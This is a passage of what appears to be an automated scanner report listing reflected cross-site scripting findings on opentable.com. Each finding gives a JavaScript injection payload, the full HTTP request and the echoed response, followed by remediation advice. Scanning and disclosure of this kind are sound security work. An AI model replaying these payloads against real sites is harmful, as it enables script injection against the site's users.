Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod25d31';alert(1)//e91e394761e&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new H
...[SNIP]...
4.62. http://www.opentable.com/interim.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c312e'%3balert(1)//0cc46fdb0ea was submitted in the t parameter. This input was echoed as c312e';alert(1)//0cc46fdb0ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=singlec312e'%3balert(1)//0cc46fdb0ea&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:49 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a49&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=29&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=6&vbefreg=6&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=29&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=29&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46196


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
'7:00 PM';
ResultProperties.Request.PartySize = 2;
ResultProperties.Request.Action = '';
ResultProperties.Request.DateTime = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Request.SearchType = 'singlec312e';alert(1)//0cc46fdb0ea';
ResultProperties.Request.SearchDate = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Response.ResultsType = 5;
ResultProperties.Response.IsWhiteLabelRestRefSearch = true;
ResultProperties.Response.
...[SNIP]...
4.63. http://www.opentable.com/opentables.aspx [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a79b6'%3balert(1)//ef617dd9c1 was submitted in the d parameter. This input was echoed as a79b6';alert(1)//ef617dd9c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PMa79b6'%3balert(1)//ef617dd9c1&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a58&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=37&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
alDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PMa79b6';alert(1)//ef617dd9c1&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
ResultProperties.InResult
...[SNIP]...
4.64. http://www.opentable.com/opentables.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e873'%3balert(1)//c9d78f9b326 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e873';alert(1)//c9d78f9b326 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod&8e873'%3balert(1)//c9d78f9b326=1 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:05 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a05&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod%268e873'%253balert(1)%252f%252fc9d78f9b326%3d1&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=49&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=12&vbefreg=12&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=49&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=49&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46366


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&8e873';alert(1)//c9d78f9b326=1&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new
...[SNIP]...
4.65. http://www.opentable.com/opentables.aspx [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8520'%3balert(1)//d273cd86d21 was submitted in the p parameter. This input was echoed as e8520';alert(1)//d273cd86d21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2e8520'%3balert(1)//d273cd86d21&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a57&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
